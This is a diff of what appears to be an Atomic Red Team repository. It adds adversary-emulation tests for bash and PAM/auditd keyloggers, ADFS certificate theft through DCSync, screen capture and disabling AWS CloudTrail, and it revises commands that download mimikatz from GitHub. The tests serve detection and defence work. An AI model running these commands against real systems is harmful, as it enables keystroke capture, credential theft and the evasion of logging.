+          echo "\$PROMPT_COMMAND=$PROMPT_COMMAND"
+          tail /var/log/syslog
+        cleanup_command: 'unset PROMPT_COMMAND
+
+'
+    - name: Bash session based keylogger
+      auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258
+      description: "When a command is executed in bash, the BASH_COMMAND variable
+        contains that command. For example :~$ echo $BASH_COMMAND = \"echo $BASH_COMMAND\".
+        The trap command is not a external command, but a built-in function of bash
+        and can be used in a script to run a bash function when some event occurs.
+        trap will detect when the BASH_COMMAND variable value changes and then pipe
+        that value into a file, creating a bash session based keylogger. \n\nTo gain
+        persistence the command could be added to the users .bashrc or .bash_aliases
+        or the systems default .bashrc in /etc/skel/ \n"
+      supported_platforms:
+      - linux
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'This test requires to be run in a bash shell
+
+'
+        prereq_command: 'if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n*****
+          Bash not running! *****\n"; exit 1; fi
+
+'
+        get_prereq_command: 'echo ""
+
+'
+      input_arguments:
+        output_file:
+          name: output_file
+          description: File to store captured commands
+          type: String
+          default: "/tmp/.keyboard.log"
+      executor:
+        name: command_prompt
+        elevation_required: false
+        command: |
+          trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> #{output_file}' DEBUG
+          echo "Hello World!"
+          cat #{output_file}
+        cleanup_command: 'rm #{output_file}
+
+'
+    - name: SSHD PAM keylogger
+      auto_generated_guid: 81d7d2ad-d644-4b6a-bea7-28ffe43becca
+      description: 'Linux PAM (Pluggable Authentication Modules) is used in sshd authentication.
+        The Linux audit tool auditd can use the pam_tty_audit module to enable auditing
+        of TTY input and capture all keystrokes in a ssh session and place them in
+        the /var/log/audit/audit.log file after the session closes.
+
+'
+      supported_platforms:
+      - linux
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'This test requires sshd and auditd
+
+'
+        prereq_command: |
+          if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi
+          if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi
+        get_prereq_command: 'echo ""
+
+'
+      input_arguments:
+        user_account:
+          description: Basic ssh user account for testing.
+          type: string
+          default: ubuntu
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: "cp -v /etc/pam.d/sshd /tmp/\necho >> \"session required pam_tty_audit.so
+          disable=* enable=* open_only log_passwd\"\nsystemctl restart sshd\nsystemctl
+          restart auditd\nssh #{user_account}@localhost \nwhoami\nsudo su\nwhoami\nexit\nexit\n"
+        cleanup_command: 'cp -fv /tmp/sshd /etc/pam.d/
+
+'
+    - name: Auditd keylogger
+      auto_generated_guid: a668edb9-334e-48eb-8c2e-5413a40867af
+      description: "The linux audit tool auditd can be used to capture 32 and 64 bit
+        command execution and place the command in the /var/log/audit/audit.log audit
+        log. \n"
+      supported_platforms:
+      - linux
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'This test requires sshd and auditd
+
+'
+        prereq_command: 'if [ ! -x "$(command -v auditd)" ]; then echo -e "\n*****
+          auditd NOT installed *****\n"; exit 1; fi
+
+'
+        get_prereq_command: 'echo ""
+
+'
+      input_arguments:
+        output_file:
+          description: description
+          type: type
+          default: default
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: "auditctl -a always,exit -F arch=b64 -S execve -k CMDS \nauditctl
+          -a always,exit -F arch=b32 -S execve -k CMDS\nwhoami; ausearch -i --start
+          $(date +\"%d/%m/%y %H:%M:%S\") \n"
+        cleanup_command: 'systemctl restart auditd
+
+'
   T1557.001:
     technique:
       external_references:
@@ -3030,15 +3293,8 @@ credential-access:
 '
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-          $url = 'https://github.com/gentilkiwi/mimikatz/releases/latest'
-          $request = [System.Net.WebRequest]::Create($url)
-          $response = $request.GetResponse()
-          $realTagUrl = $response.ResponseUri.OriginalString
-          $version = $realTagUrl.split('/')[-1]
-          $fileName = 'mimikatz_trunk.zip'
-          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-          $realDownloadUrl =$realTagUrl.Replace('tag','download') + '/' + $fileName
-          Invoke-WebRequest $realDownloadUrl -OutFile "$env:TEMP\Mimi.zip"
+          $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+          Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\Mimi.zip"
           Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force
           New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null
           Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force
@@ -5072,6 +5328,99 @@ credential-access:
 
 '
         name: sh
+    - name: ADFS token signing and encryption certificates theft - Local
+      auto_generated_guid: 78e95057-d429-4e66-8f82-0f060c1ac96f
+      description: |
+        Retrieve ADFS token signing and encrypting certificates. This is a precursor to the Golden SAML attack (T1606.002). You must be signed in as Administrator on an ADFS server.
+        Based on https://o365blog.com/post/adfs/ and https://github.com/fireeye/ADFSDump.
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'AADInternals module must be installed.
+
+'
+        prereq_command: 'if (Get-Module AADInternals) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'Install-Module -Name AADInternals -Force
+
+'
+      executor:
+        command: |
+          Import-Module AADInternals -Force
+          Export-AADIntADFSCertificates
+          Get-ChildItem | Where-Object {$_ -like "ADFS*"}
+          Write-Host "`nCertificates retrieved successfully"
+        cleanup_command: |
+          Remove-Item -Path ".\ADFS_encryption.pfx"
+          Remove-Item -Path ".\ADFS_signing.pfx"
+        name: powershell
+    - name: ADFS token signing and encryption certificates theft - Remote
+      auto_generated_guid: cab413d8-9e4a-4b8d-9b84-c985bd73a442
+      description: |
+        Retrieve ADFS token signing and encrypting certificates. This is a precursor to the Golden SAML attack (T1606.002). You must be signed in as a Domain Administrators user on a domain-joined computer.
+        Based on https://o365blog.com/post/adfs/ and https://github.com/fireeye/ADFSDump.
+      supported_platforms:
+      - windows
+      input_arguments:
+        adfs_service_account_name:
+          description: Name of the ADFS service account
+          type: String
+          default: adfs_svc
+        replication_user:
+          description: Username with replication rights. It can be the Domain Admin
+            running the script
+          type: String
+          default: Administrator
+        replication_password:
+          description: Password of replication_username
+          type: String
+          default: ReallyStrongPassword
+        adfs_server_name:
+          description: Name of an ADFS server
+          type: String
+          default: sts.contoso.com
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'AADInternals and ActiveDirectory modules must be installed.
+
+'
+        prereq_command: 'if ($(Get-Module AADInternals) -or $(Get-Module -ListAvailable
+          -Name ActiveDirectory)) {echo 0} else {echo 1}
+
+'
+        get_prereq_command: 'Install-Module -Name AADInternals -Force
+
+'
+      executor:
+        command: "Import-Module ActiveDirectory -Force \nImport-Module AADInternals
+          -Force | Out-Null\n#Get Configuration\n$dcServerName = (Get-ADDomainController).HostName\n$svc
+          = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object
+          name -eq \"#{adfs_service_account_name}\"\n$PWord = ConvertTo-SecureString
+          -String \"#{replication_password}\" -AsPlainText -Force\n$Credential = New-Object
+          -TypeName System.Management.Automation.PSCredential -ArgumentList #{replication_user},
+          $PWord\n# use DCSync to fetch the ADFS service account's NT hash\n$hash
+          = Get-AADIntADUserNTHash -ObjectGuid $svc.ObjectGuid -Credentials $Credential
+          -Server $dcServerName -AsHex\n$ADFSConfig = Export-AADIntADFSConfiguration
+          -Hash $hash -SID $svc.Objectsid.Value -Server #{adfs_server_name}\n# Get
+          certificates decryption key\n$Configuration = [xml]$ADFSConfig\n$group =
+          $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.Group\n$container
+          = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ContainerName\n$parent
+          = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ParentContainerDn\n$base
+          = \"LDAP://CN=$group,$container,$parent\"\n$ADSearch = [System.DirectoryServices.DirectorySearcher]::new([System.DirectoryServices.DirectoryEntry]::new($base))\n$ADSearch.Filter
+          = '(name=CryptoPolicy)'\n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"displayName\")
+          | Out-Null\n$aduser = $ADSearch.FindOne()\n$keyObjectGuid = $ADUser.Properties[\"displayName\"]
+          \n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"thumbnailphoto\")
+          | Out-Null\n$ADSearch.Filter=\"(l=$keyObjectGuid)\"\n$aduser=$ADSearch.FindOne()
+          \n$key=[byte[]]$aduser.Properties[\"thumbnailphoto\"][0] \n# Get encrypted
+          certificates from configuration and decrypt them\nExport-AADIntADFSCertificates
+          -Configuration $ADFSConfig -Key $key\nGet-ChildItem | Where-Object {$_ -like
+          \"ADFS*\"}\nWrite-Host \"`nCertificates retrieved successfully\"\n"
+        cleanup_command: |
+          Remove-Item -Path ".\ADFS_encryption.pfx"
+          Remove-Item -Path ".\ADFS_signing.pfx"
+        name: powershell
   T1003.007:
     technique:
       external_references:
@@ -8118,6 +8467,148 @@ collection:
           sudo cp -f /tmp/system-auth.bk /etc/pam.d/system-auth
         name: sh
         elevation_required: true
+    - name: Logging bash history to syslog
+      auto_generated_guid: 0e59d59d-3265-4d35-bebd-bf5c1ec40db5
+      description: "There are several variables that can be set to control the appearance
+        of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents
+        of these variables are executed as if they had been typed on the command line.
+        The PROMPT_COMMAND variable \"if set\" will be executed before the PS1 variable
+        and can be configured to write the latest \"bash history\" entries to the
+        syslog.\n\nTo gain persistence the command could be added to the users .bashrc
+        or .bash_aliases or the systems default .bashrc in /etc/skel/ \n"
+      supported_platforms:
+      - linux
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'This test requires to be run in a bash shell and that logger
+          and tee are installed.
+
+'
+        prereq_command: |
+          if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi
+          if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi
+          if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi
+        get_prereq_command: 'echo ""
+
+'
+      executor:
+        name: sh
+        elevation_required: true
+        command: |
+          PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t "$USER[$$] $SSH_CONNECTION ")'
+          echo "\$PROMPT_COMMAND=$PROMPT_COMMAND"
+          tail /var/log/syslog
+        cleanup_command: 'unset PROMPT_COMMAND
+
+'
+    - name: Bash session based keylogger
+      auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258
+      description: "When a command is executed in bash, the BASH_COMMAND variable
+        contains that command. For example :~$ echo $BASH_COMMAND = \"echo $BASH_COMMAND\".
+        The trap command is not a external command, but a built-in function of bash
+        and can be used in a script to run a bash function when some event occurs.
+        trap will detect when the BASH_COMMAND variable value changes and then pipe
+        that value into a file, creating a bash session based keylogger. \n\nTo gain
+        persistence the command could be added to the users .bashrc or .bash_aliases
+        or the systems default .bashrc in /etc/skel/ \n"
+      supported_platforms:
+      - linux
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'This test requires to be run in a bash shell
+
+'
+        prereq_command: 'if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n*****
+          Bash not running! *****\n"; exit 1; fi
+
+'
+        get_prereq_command: 'echo ""
+
+'
+      input_arguments:
+        output_file:
+          name: output_file
+          description: File to store captured commands
+          type: String
+          default: "/tmp/.keyboard.log"
+      executor:
+        name: command_prompt
+        elevation_required: false
+        command: |
+          trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> #{output_file}' DEBUG
+          echo "Hello World!"
+          cat #{output_file}
+        cleanup_command: 'rm #{output_file}
+
+'
+    - name: SSHD PAM keylogger
+      auto_generated_guid: 81d7d2ad-d644-4b6a-bea7-28ffe43becca
+      description: 'Linux PAM (Pluggable Authentication Modules) is used in sshd authentication.
+        The Linux audit tool auditd can use the pam_tty_audit module to enable auditing
+        of TTY input and capture all keystrokes in a ssh session and place them in
+        the /var/log/audit/audit.log file after the session closes.
+
+'
+      supported_platforms:
+      - linux
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'This test requires sshd and auditd
+
+'
+        prereq_command: |
+          if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi
+          if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi
+        get_prereq_command: 'echo ""
+
+'
+      input_arguments:
+        user_account:
+          description: Basic ssh user account for testing.
+          type: string
+          default: ubuntu
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: "cp -v /etc/pam.d/sshd /tmp/\necho >> \"session required pam_tty_audit.so
+          disable=* enable=* open_only log_passwd\"\nsystemctl restart sshd\nsystemctl
+          restart auditd\nssh #{user_account}@localhost \nwhoami\nsudo su\nwhoami\nexit\nexit\n"
+        cleanup_command: 'cp -fv /tmp/sshd /etc/pam.d/
+
+'
+    - name: Auditd keylogger
+      auto_generated_guid: a668edb9-334e-48eb-8c2e-5413a40867af
+      description: "The linux audit tool auditd can be used to capture 32 and 64 bit
+        command execution and place the command in the /var/log/audit/audit.log audit
+        log. \n"
+      supported_platforms:
+      - linux
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'This test requires sshd and auditd
+
+'
+        prereq_command: 'if [ ! -x "$(command -v auditd)" ]; then echo -e "\n*****
+          auditd NOT installed *****\n"; exit 1; fi
+
+'
+        get_prereq_command: 'echo ""
+
+'
+      input_arguments:
+        output_file:
+          description: description
+          type: type
+          default: default
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: "auditctl -a always,exit -F arch=b64 -S execve -k CMDS \nauditctl
+          -a always,exit -F arch=b32 -S execve -k CMDS\nwhoami; ausearch -i --start
+          $(date +\"%d/%m/%y %H:%M:%S\") \n"
+        cleanup_command: 'systemctl restart auditd
+
+'
   T1557.001:
     technique:
       external_references:
@@ -8920,6 +9411,31 @@ collection:
         cleanup_command: 'rm #{output_file} -ErrorAction Ignore
 
 '
+    - name: Windows Screen Capture (CopyFromScreen)
+      auto_generated_guid: e9313014-985a-48ef-80d9-cde604ffc187
+      description: |
+        Take a screen capture of the desktop through a call to the [Graphics.CopyFromScreen] .NET API.
+
+        [Graphics.CopyFromScreen]: https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen
+      supported_platforms:
+      - windows
+      input_arguments:
+        output_file:
+          description: Path where captured results will be placed
+          type: Path
+          default: "$env:TEMP\\T1113.png"
+      executor:
+        command: |
+          Add-Type -AssemblyName System.Windows.Forms
+          $screen = [Windows.Forms.SystemInformation]::VirtualScreen
+          $bitmap = New-Object Drawing.Bitmap $screen.Width, $screen.Height
+          $graphic = [Drawing.Graphics]::FromImage($bitmap)
+          $graphic.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $bitmap.Size)
+          $bitmap.Save("#{output_file}")
+        cleanup_command: 'Remove-Item #{output_file} -ErrorAction Ignore
+
+'
+        name: powershell
   T1213.002:
     technique:
       external_references:
@@ -15689,7 +16205,8 @@ privilege-escalation:
         get_prereq_command: |
           $mimikatz_path = cmd /c echo #{mimikatz_path}
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-          Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+          $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+          Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
           Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
           New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
           Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
@@ -22565,7 +23082,50 @@ defense-evasion:
       - Matt Snyder, VMware
       x_mitre_platforms:
       - IaaS
-    atomic_tests: []
+      identifier: T1562.008
+    atomic_tests:
+    - name: AWS CloudTrail Changes
+      auto_generated_guid: 9c10dc6b-20bd-403a-8e67-50ef7d07ed4e
+      description: 'Creates a new cloudTrail in AWS, Upon successful creation it will
+        Update,Stop and Delete the cloudTrail
+
+'
+      supported_platforms:
+      - iaas:aws
+      input_arguments:
+        cloudtrail_name:
+          description: Name of the cloudTrail
+          type: String
+          default: redatomictesttrail
+        s3_bucket_name:
+          description: Name of the bucket
+          type: String
+          default: redatomic-test
+        region:
+          description: Name of the region
+          type: String
+          default: us-east-1
+      dependencies:
+      - description: 'Check if ~/.aws/credentials file has a default stanza is configured
+
+'
+        prereq_command: |
+          cat ~/.aws/credentials | grep "default"
+          aws s3api create-bucket --bucket #{s3_bucket_name} --region #{region}
+          aws s3api put-bucket-policy --bucket #{s3_bucket_name} --policy file://$PathToAtomicsFolder/T1562.008/src/policy.json
+        get_prereq_command: 'echo Please install the aws-cli and configure your AWS
+          defult profile using: aws configure
+
+'
+      executor:
+        command: |
+          aws cloudtrail create-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --region #{region}
+          aws cloudtrail update-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name}  --is-multi-region-trail --region #{region}
+          aws cloudtrail stop-logging --name #{cloudtrail_name} --region #{region}
+          aws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region}
+        cleanup_command: "aws s3 rb s3://#{s3_bucket_name} --force \n"
+        name: sh
+        elevation_required: false
   T1600.002:
     technique:
       id: attack-pattern--7efba77e-3bc4-4ca5-8292-d8201dcd64b5
@@ -30531,7 +31091,8 @@ defense-evasion:
           if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
         get_prereq_command: |
           $mimikatz_path = cmd /c echo #{mimikatz_path}
-          Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210724/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+          $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+          Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
           Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
           New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
           Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
@@ -30690,7 +31251,8 @@ defense-evasion:
 '
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-          Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip"
+          $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+          Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\Mimi.zip"
           Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force
           New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null
           Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force
@@ -31821,7 +32383,8 @@ defense-evasion:
         get_prereq_command: |
           $mimikatz_path = cmd /c echo #{mimikatz_path}
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-          Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+          $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+          Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
           Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
           New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
           Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
@@ -33011,7 +33574,8 @@ defense-evasion:
           if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
         get_prereq_command: |
           $mimikatz_path = cmd /c echo #{mimikatz_path}
-          Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+          $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+          Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
           Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
           New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
           Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
@@ -63139,7 +63703,8 @@ lateral-movement:
           if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
         get_prereq_command: |
           $mimikatz_path = cmd /c echo #{mimikatz_path}
-          Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210724/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+          $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+          Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
           Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
           New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
           Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
@@ -63298,7 +63863,8 @@ lateral-movement:
 '
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-          Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip"
+          $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+          Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\Mimi.zip"
           Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force
           New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null
           Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force

atomics/T1003.001/T1003.001.md

@@ -340,15 +340,8 @@ if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
 ##### Get Prereq Commands:
 ```powershell
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-$url = 'https://github.com/gentilkiwi/mimikatz/releases/latest'
-$request = [System.Net.WebRequest]::Create($url)
-$response = $request.GetResponse()
-$realTagUrl = $response.ResponseUri.OriginalString
-$version = $realTagUrl.split('/')[-1]
-$fileName = 'mimikatz_trunk.zip'
-[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-$realDownloadUrl =$realTagUrl.Replace('tag','download') + '/' + $fileName
-Invoke-WebRequest $realDownloadUrl -OutFile "$env:TEMP\Mimi.zip"
+$mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\Mimi.zip"
 Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force
 New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null
 Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force

atomics/T1003.001/T1003.001.yaml

@@ -187,15 +187,8 @@ atomic_tests:
       if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
     get_prereq_command: |
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-      $url = 'https://github.com/gentilkiwi/mimikatz/releases/latest'
-      $request = [System.Net.WebRequest]::Create($url)
-      $response = $request.GetResponse()
-      $realTagUrl = $response.ResponseUri.OriginalString
-      $version = $realTagUrl.split('/')[-1]
-      $fileName = 'mimikatz_trunk.zip'
-      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-      $realDownloadUrl =$realTagUrl.Replace('tag','download') + '/' + $fileName
-      Invoke-WebRequest $realDownloadUrl -OutFile "$env:TEMP\Mimi.zip"
+      $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+      Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\Mimi.zip"
       Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force
       New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null
       Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force

atomics/T1003.006/T1003.006.md

@@ -56,7 +56,8 @@ if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
 ##### Get Prereq Commands:
 ```powershell
 $mimikatz_path = cmd /c echo #{mimikatz_path}
-Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+$mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
 Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
 New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
 Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force

atomics/T1003.006/T1003.006.yaml

@@ -32,7 +32,8 @@ atomic_tests:
       if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
     get_prereq_command: |
       $mimikatz_path = cmd /c echo #{mimikatz_path}
-      Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+      $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+      Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
       Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
       New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
       Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force

atomics/T1055/T1055.md

@@ -111,7 +111,8 @@ if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
 ```powershell
 $mimikatz_path = cmd /c echo #{mimikatz_path}
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+$mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
